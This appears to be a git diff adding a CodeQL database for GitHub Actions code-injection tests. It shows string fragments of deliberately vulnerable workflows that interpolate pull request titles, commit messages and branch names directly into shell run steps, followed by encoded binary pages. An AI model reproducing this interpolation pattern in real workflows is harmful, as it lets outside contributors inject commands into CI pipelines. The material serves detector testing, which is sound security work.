push/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yamlglobal_envtestglobal_ ... itle }}job_envjob_env ... itle }}echo '${{ env.global_env }}'echo '$ ... 
env }}'run: ec ... env }}'echo '${{ env.test }}'echo '$ ... est }}'run: ec ... est }}'echo '${{ env.job_env }}'echo '${{ env.step_env }}'step_envstep_en ... itle }}env:on: issues/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.ymlCodeQL Auto Language"CodeQL ... nguage"[ main ]branches: [ main ]schedulecron17 19 * * 6'17 19 * * 6'cron: '17 19 * * 6'- cron: ... * * 6'create-matrixmatrix${{ steps.set-matrix.outputs.all_changed_files }}matrix: ... iles }}set-matrix- name: ... d filesanalyze${{ needs.create-matrix.outputs.matrix != '[]' }}${{ nee ... '[]' }}Analyzeactionsreadcontentssecurity-eventswriteactions: readstrategyfail-fastfalselanguage${{ fromJSON(needs.create-matrix.outputs.matrix) }}${{ fro ... rix) }}languag ... rix) }}fail-fast: falseCheckout repositoryname: C ... ository${{ matrix.language }} +| run: | - name: ... ositoryneeds: create-matrixcreate-matrix:name: " ... nguage"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.ymlsimple1${{ github.event.head_commit.message }}${{ git ... sage }}source: ... sage }}id: source no-stepecho "test=foo" >> "$GITHUB_OUTPUT"echo "t ... OUTPUT"id: no-stepecho "echo ${{steps.no-step.outputs.foo}}" +- id: source simple1:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.ymlfoobarfoo'foobarfoo'source: 'foobarfoo'for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" +done +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.ymlpull_request_reviewecho '${{ github.event.pull_request.title }}'echo '${{ github.event.pull_request.body }}'echo '${{ github.event.pull_request.head.label }}'echo '$ ... bel }}'run: ec ... 
bel }}'echo '${{ github.event.pull_request.head.repo.default_branch }}'echo '$ ... nch }}'run: ec ... nch }}'echo '${{ github.event.pull_request.head.repo.description }}'echo '$ ... ion }}'run: ec ... ion }}'echo '${{ github.event.pull_request.head.repo.homepage }}'echo '$ ... age }}'run: ec ... age }}'echo '${{ github.event.pull_request.head.ref }}'echo '$ ... ref }}'run: ec ... ref }}'echo '${{ github.event.review.body }}'on: pul ... _review/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.ymlpull_request_review_commentpull_re ... commenton: pul ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.ymlpull_request_targetrun: ec ... definedecho '${{ github.head_ref }}'- run: ... definedon: pul ... _target/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.ymlecho '${{ github.event.commits[11].message }}'echo '${{ github.event.commits[11].author.email }}'echo '$ ... ail }}'run: ec ... ail }}'echo '${{ github.event.commits[11].author.name }}'echo '${{ github.event.head_commit.message }}'echo '${{ github.event.head_commit.author.email }}'echo '${{ github.event.head_commit.author.name }}'echo '${{ github.event.head_commit.committer.email }}'echo '${{ github.event.head_commit.committer.name }}'echo '${{ github.event.commits[11].committer.email }}'echo '${{ github.event.commits[11].committer.name }}'- run: ... 
age }}'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.ymlsummaryid: summaryflowecho "${{steps.summary.outputs.value}}" +id: flow no-flowecho "${{steps.summary.outputs.foo}}" +id: no-flow- id: summary/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml[pull_r ... equest]for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" +done +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml${{ steps.step2.outputs.test }}${{ ste ... test }}job_out ... test }}step0id: step0 step1${{ steps.step0.outputs.value}}${{ ste ... value}}BODY: $ ... value}}shellpowershellWrite-Output "::set-output name=MSG::$ENV{BODY}" +id: step1step2MSG${{steps.step1.outputs.MSG}}${{step ... s.MSG}}MSG: ${ ... s.MSG}}echo "test=$MSG" >> "$GITHUB_OUTPUT"id: step2run: ec ... utput}}- run: ... 
utput}}/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.ymlworkflow_runworkflows[test]workflows: [test]workflow_run:echo '${{ github.event.workflow_run.display_title }}'echo '${{ github.event.workflow_run.head_commit.message }}'echo '${{ github.event.workflow_run.head_commit.author.email }}'echo '${{ github.event.workflow_run.head_commit.author.name }}'echo '${{ github.event.workflow_run.head_commit.committer.email }}'echo '${{ github.event.workflow_run.head_commit.committer.name }}'echo '${{ github.event.workflow_run.head_branch }}'echo '${{ github.event.workflow_run.head_repository.description }}'on:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1'test'descriptionbrandingiconcoloricon: 'test'inputsrequireddefaultdescription: testtest:runsusingcomposite"composite"using: "composite"name: 'test'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2Hello World'Hello World'Greet someone and record the time'Greet ... e time'who-to-greetWho to greet'Who to greet'trueWorld'World'descrip ... greet'who-to- ... f inputtimeThe time we greeted you'The ti ... ed you'descrip ... ed you'time: # id of outputdocker'docker'imageDockerfile'Dockerfile'args${{ inputs.who-to-greet }}${{ inp ... reet }}- ${{ i ... reet }}using: 'docker'name: 'Hello World'hSt¹>w \ No newline at end of file 
diff --git a/db/db-yaml/default/pools/1/buckets/info b/db/db-yaml/default/pools/1/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2 GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/buckets/page-000000 b/db/db-yaml/default/pools/1/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/ids1/info b/db/db-yaml/default/pools/1/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/indices1/info b/db/db-yaml/default/pools/1/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/info b/db/db-yaml/default/pools/1/info new file mode 100644 index 0000000000000000000000000000000000000000..9b4ec24220f77cd70a002420d93e390bfc4c1f7a GIT binary patch literal 41 ccmZQz00U+q$+QN785kjAU>eL`E;&&F04bXS)Bpeg literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/metadata/info b/db/db-yaml/default/pools/1/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/pools/1/metadata/page-000000 b/db/db-yaml/default/pools/1/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/pools/1/pageDump/page-000000000 b/db/db-yaml/default/pools/1/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U 
zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N 
z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly 
zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/poolInfo b/db/db-yaml/default/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..df3045a1ff5f4f01ad1cca4e97dbff096c69683a GIT binary patch literal 32 acmZQz00Sl<$;iOKv<5;$1SjTkivs`;zX8+$ literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/sourceLocationPrefix.rel b/db/db-yaml/default/sourceLocationPrefix.rel new file mode 100644 index 0000000000000000000000000000000000000000..fde1ac19d2b083530bcab4cb4fd2dcaa285234ab GIT binary patch literal 4 LcmZQzU|3lW!zSrk$os%~sBO;^f z^{@6k&ubQk4`)ww^AgAPyqQ!+<^t4j=p&ftQRe(WeMgO;zM;OCePGC`7&3WYZ|0@K zjc2DUIFYlPL*@o(Pl(sFq=Iuv?=r`oI?D5I6>pQ||))Un8v6}{Q ziTa!UC^%P`+x0=s|nS^WPXh)f|s{PvvYinJ__f)tVZyAiSh`i|v{jhpp zX&s{QWra2DEJJF^7{@$Jhu65Pyt(qVc;jD4h6RCzk%L&fh@c!~O5)_>Z9 z2)!FQFXH))N(|0VRvXE#03N9Je^7TS+8gF`zt$hXD(4A>Yd>I&CblS#VbU-s3%Ij& zKt>SVM`h0t+>f45@$T+srDa#x^##qJnS8{K5q5Jszp-jiUp z;#)y&0S}^ff%D=mN;jtloIU@-y)MH`(mxWP^~ARSs`iGcJAM~FtqNL-eo#D(L{Egi zOFZR7YpHV7x>ubcK9x{eJgBv!9hEQPwSJt2riYgbTLfUL9_zwloihypUfFP+&KL8eR${U`(ruD ze;MYXfW7``Tg7*O(fHv;QP;o~M88Y_PH;k%mmh8-^S^liQX!v$Ylz>_-%^*Dzobs6 z{bcZ;!WDuWNL{C1U_M3J(*&?y?O5LQaSmUIy#o%X{Tg?{yC3fydVO`@K5g>BAHzN5 z!#_;MGQ}rn&PAo+j_&Zkh*m<~rR=_NF6=5%lBm6B;nK-GP^e?IOaOPxz zFDf{iiT?ft-$(JUFmKZaAH3M%YO^!Z;nKsIvxWMaIwP~;5|~dc&mh^Wsoofy)ynvr zQvIlvEcA%Q(wQ)xcX>yz2yb{x_S-u-@!1=#c9)1=i~c0FmMS4!a(XKH%^lQ^$lf;5 zOv@u=W93T;H^Z94^!Sn!#^U{~JXyrJN^yR>=XpzRgpTS>em=uJL-iuBjCeOPXBON{ z?RS7r!91R7C-<)eUkG^1SlOK~o%M((BUzt2dBxdUO%;o{{h(o@WEFEVUFSOW#%v0^ zzM#34+LXAy%>O73BNl)xAZROJslC^s{5?Z z_U8e|oE@vRX0I!Co;v4~@qxpYWU&!hs~z6tWu}J8J-5M+;~8xPPL6>4qt(#wHsx)D zbWzF8MH>Xy75uZ(T=<3a#+?{mR$O6s!I`r%KP&#@;CNJH>L<#a8{GdG{c6+{`YDaJ zT&St?=2_C;hhISMRJHOC_>P(_{K^7)D%n?*7f;^TO_85~cdOs|k<#YFzo;}Ng}{R$ zQ_L_j273L;nJZZvoy?@nX{nUdV)gE(%=0L7;ws+E$Ao_moKUdg|L=KPvKpw&>k8Za zcD&~jwHacT=mnVw~P$Pva zOpim|Q63$?5N{^xl8_m|Ex;4#L1z>~9HqBaxSm?-3Vxn@2P<94UYUS5Sx-Aa`vA{L zYmz=!-7ydD9(x_A9pH8Jg47zy?>q|mJM{rnEjG9zY%AE3|ZHOL2 zzQdSK2(whOCgJa^^6Ww}xPo?2eGNDnyCew$v$0_g)}x1Yl&RP$9l4b^Pm8~mQnguAAGo3{N2qNz%? literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/strings/0/metadata/page-000000 b/db/db-yaml/default/strings/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..cb4291b6b3b65463c7b9660f099668c0cfc4fe35 GIT binary patch literal 16384 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 